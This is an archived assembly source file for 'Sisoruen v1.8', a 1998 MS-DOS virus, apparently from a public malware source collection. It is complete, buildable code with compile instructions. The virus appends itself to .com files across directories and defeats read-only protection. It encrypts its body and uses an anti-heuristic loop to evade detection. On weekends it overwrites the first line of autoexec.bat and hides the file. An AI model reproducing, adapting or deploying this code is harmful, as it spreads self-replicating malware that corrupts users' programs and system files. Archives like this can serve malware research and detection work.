MalwareSourceCode/MSDOS/S-Index/Virus.MSDOS.Unknown.sisoruen.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

282 lines
14 KiB
NASM

; ------------------------------------------------------------------------- ;
; Sisoruen v1.8 coded by KilJaeden of the Codebreakers 1998 ;
; ------------------------------------------------------------------------- ;
; Description: `--------------------------------------| Size : 484 bytes ;
; | Type : COM Appender ;
; v1.0 - start with a simple *.com appender | Rate : All to Root ;
; v1.1 - lets do some XOR,NEG,NOT,ROR encryption! | DT : DotDot Style ;
; v1.2 - infect even read only files, restore stamps | Pload: autoexec.bat ;
; v1.3 - add anti-heuristic loop (credits to SPo0ky!) | Encrp: 4 times - ;
; v1.4 - don't infect files too small, or too big | XOR,NEG,NOT,ROR ;
; v1.5 - lets give it a payload, activate sat/sun `-------------------- ;
; v1.6 - optimized a WHOLE lot, and fixed an error that was bugging the ;
; - crap out of me -> Thanks to SPo0ky for pointing out that my 'safe' ;
; - place to store the DTA was getting destroyed by the encryption :) ;
; v1.7 - lets get some directory transversal going, dot dot style ;
; v1.8 - new payload this time, after it has infected all the .com's it can ;
; - get it's hands on, it jumps to c:\ and replaces the first line of ;
; - the "autoexec.bat" file, changing the normal dos prompt (c:\) to ;
; - c:\::Sisoruen::> !warning! -> it replaces the first line, so be ;
; - carefull, some people have important info on that first line hehe ;
; - Oh and it also makes the autoexec.bat read-only and hidden! :) ;
; - Hey, some people don't know how to un-readonly / un-hide a file... ;
; - Slows them down a little hehe ;
; ------------------------------------------------------------------------- ;
; --> This One's For :Mind Warp: Keep Up The Great Work, You Learn Fast! <--;
; ------------------------------------------------------------------------- ;
; to compile ::] tasm sisoruen.asm ;
; to link :::::] tlink /t sisoruen.asm ;
; ------------------------------------------------------------------------- ;
code segment ; name our segment code
assume cs:code,ds:code ; assign cs and ds to code
org 100h ; 100hex .com file
start:
db 0e9h,0,0 ; define a blank jump to next line
real_start:
mov cx,0ffffh ; from other anti-heuristics
anti_one:
jmp anti_two ; jump to anti two
mov ax,4c00h ; terminate program
int 21h ; terminate the program
anti_two:
loop anti_one ; loop anti_one
call get_delta ; push IP on to stack
get_delta:
pop bp ; pop it into bp
sub bp,offset get_delta ; get the delta offset
encrypt:
jmp not_on_first ; don't encrypt 1st run (overwritten)
lea si,[bp+encrypted] ; SI points to encrypted area start
mov di,si ; moves SI into DI
call encryption ; calls the encryption routine
jmp encrypted ; jump to start of encrypted area
encryption:
lodsb ; load a byte
not al ; encryptin 1
ror al,4 ; encryptin 2
neg al ; encryptin 3
xor al,byte ptr [bp+decrypt] ; encryptin 4 -final-
neg al ; unencrypt 3
ror al,4 ; unencrypt 2
not al ; unencrypt 1
stosb ; store the byte
loop encryption ; do it for all bytes
ret ; return from the call
decrypt db 0 ; our key value
encrypted:
lea si,[bp+thrbyte] ; where to put this
mov di,100h ; the starting location
push di ; 1 - push 100h until end
movsb ; move a byte
movsw ; and move a word
lea dx,[bp+offset dta] ; where we want to move the dta
mov ah,1ah ; move the dta
int 21h ; make it so DOS!
find_next:
mov ah,4eh ; find the first file with
lea dx,[bp+comfile] ; a *.com ending
mov cx,7 ; find even if +srh
infect_next:
int 21h ; make it so DOS!
jnc infect_file ; found one? infect it!
mov ah,3bh ; change directory
lea dx,[bp+dotdot] ; load up ".."
int 21h ; and change dir now
jnc find_next ; start infecting again
try_pay:
mov ah,2ah ; get system time
int 21h ; get the time now
cmp al,006h ; is it saturday?
je payload ; it is! I love the weekends
cmp al,00h ; is it sunday?
je payload ; it is! I love payloading weekends
end_virus:
mov dx,80h ; restore the dta
mov ah,1ah ; restore it now
int 21h ; make it so DOS!
retn ; 1 - return control to host
payload:
mov ah,0eh ; change drive
mov dl,2 ; to drive c:\
int 21h ; change it now!
mov ah,3bh ; change directory
lea dx,[bp+rootdir] ; load up "\"
int 21h ; and change dir now
mov ah,4eh ; find the first file
lea dx,[bp+autoexe] ; looking for "autoexec.bat" :)
mov cx,3 ; find it even if +rh
int 21h ; find the autoexec.bat!
jc end_virus ; none? end the virus
lea dx,[bp+offset dta+1eh] ; get the file info
push dx ; 7 - save that info for later
mov ax,4301h ; set file attributes
xor cx,cx ; to absolutely none
int 21h ; make it so DOS!
mov ax,3d02h ; open the autoexec.bat
int 21h ; open it / get info
xchg bx,ax ; exchange the info
call point_to_start ; point to start of file
mov ah,40h ; write to the autoexec.bat
lea dx,[bp+newprmt] ; write this
mov cx,cpend-cpstart ; this much
int 21h ; write it!
pop dx ; 7 - get the file info
mov ax,4301h ; set file attributes
mov cx,3 ; make it read only / hidden hehe
int 21h ; infect even read only now!
mov ah,3eh ; close the autoexec.bat
int 21h ; close it now bitch!
jmp end_virus ; jump to ending the virus
infect_file:
lea dx,[bp+offset dta+1eh] ; get the file info
push dx ; 2 - save it again for in a minute
mov ax,4301h ; set file attributes
xor cx,cx ; to absolutely none
int 21h ; infect even read only now!
mov ax,3d02h ; open the file read/write
pop dx ; 2 - use that info again!
int 21h ; make it so DOS!
xchg bx,ax ; move the file info
mov ax,5700h ; get the time / date
int 21h ; make it so DOS!
push dx ; 3 - save the value
push cx ; 4 - save this value too
mov ah,3fh ; read / record function
lea dx,[bp+thrbyte] ; where to write to
mov cx,3 ; how much to write
int 21h ; make it so DOS!
mov ax,word ptr [bp+dta+1ah] ; get the file size into ax
mov cx,word ptr [bp+thrbyte+1] ; get those recorded bytes
add cx,finished-real_start+3 ; get virus + jump size
cmp ax,cx ; compare the two
jz close_file ; if equal close up
cmp ax,61440 ; > then 61440 bytes?
ja close_file ; too big, close it
cmp ax,1000 ; < then 1000 bytes?
jb close_file ; too big, close it
sub ax,3 ; get the jump size
mov word ptr [bp+newjump+1],ax ; and write the jump
call point_to_start ; point to start of file
mov ah,40h ; write to file
mov cx,3 ; how much info? three bytes
lea dx,[bp+newjump] ; where the info starts
int 21h ; make it so DOS!
mov ax,4202h ; point to end of file
xor cx,cx ; cx to 0
cwd ; likewize for DX
int 21h ; make it so DOS
in al,40h ; get random value from clock
mov byte ptr [bp+decrypt],al ; save that value as our key
mov ah,40h ; write to file
lea dx,[bp+real_start] ; this is where we start
mov cx,encrypted-real_start ; write this much
int 21h ; write those bytes man!
lea di,[bp+finished] ; DI points to encrypted area end
push di ; 5 - save value for later
lea si,[bp+encrypted] ; SI points to encrypted area star
mov cx,finished-encrypted ; total # of bytes to encrypt
push cx ; 6 - save that for next routine
call encryption ; encrypt them now
mov ah,40h ; write to file
pop cx ; 6 - mov cx,finished-encrypted
pop dx ; 5 - lea dx,[bp+finished]
int 21h ; make it so DOS!
close_file:
mov ax,5701h ; restore time / date
pop cx ; 4 - restore from this value
pop dx ; 3 - restore from this one too
int 21h ; go for it!
mov ah,3eh ; close up the file
int 21h ; make it so DOS!
mov ah,4fh ; find next file
jmp infect_next ; and do it again
; ------------------------> Remote Calling Procedures <-------------------- ;
; ------------------------------------------------------------------------- ;
point_to_start:
mov ax,4200h ; point to start of file
xor cx,cx ; cx to 0
cwd ; likewize for DX
int 21h ; and point to the start
ret ; return from call
; -------------------------------> Data Area <----------------------------- ;
; ------------------------------------------------------------------------- ;
cpstart:
newprmt db 'prompt $p$f::Sisoruen::$g',0
db '',10,13,'$'
cpend:
dotdot db "..",0 ; define the .. string
rootdir db "\",0 ; define the \ string
autoexe db "autoexec.b*",0 ; look for autoexec.bat
comfile db "*.c*",0 ; define *.com string
thrbyte db 0cdh,20h,0 ; terminates on first run
newjump db 0e9h,0,0 ; a blank jump at first
dta db 42 dup (?) ; set up space for dta
finished label near ; an offset label
; ----------> Temporary Storage Area (Not Saved / Not Encrypted) <--------- ;
; ------------------------------------------------------------------------- ;
not_on_first:
lea di,[bp+encrypt] ; load DI with start address
lea si,[bp+newbytes] ; load SI with the new bytes
movsw ; move 2 bytes
movsb ; move 1 byte
jmp encrypted ; jump to start of encrypted area
newbytes:
mov cx,finished-encrypted ; overwrite the jmp with this line
; ---------------------------> It's All Over <----------------------------- ;
; ------------------------------------------------------------------------- ;
code ends ; end code segment
end start ; end / where to start
; ------------------------------------------------------------------------- ;
; ----------> How Can You Think Freely In The Shadow Of A Church <--------- ;
; ------------------------------------------------------------------------- ;